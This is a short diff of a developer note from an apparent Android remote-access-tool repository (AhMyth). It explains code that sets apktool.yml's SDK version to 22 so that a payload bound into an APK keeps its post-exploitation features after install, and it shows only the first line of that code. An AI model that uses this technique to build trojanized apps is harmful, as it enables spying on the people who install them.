Morsmalleo/AhMyth/.github/Dev/Server_Updates.md

-# Sdk change for `Apktool.yml`
+# Sdk change for apktool.yml
-This code snippet is responsible for automatically changing the `apktool.yml` file's sdk version to `22` in order for the payload to work after binding.
+This code snippet is responsible for automatically changing the `apktool.yml` file's sdk version to `22` in order for the post-exoloitation features of the payload to work after after installing a Bound apk payload.
 - AppCtrl.js
 ```js
 fs.readFile(path.join(apkFolder, 'apktool.yml'), 'utf8', (error, data) => {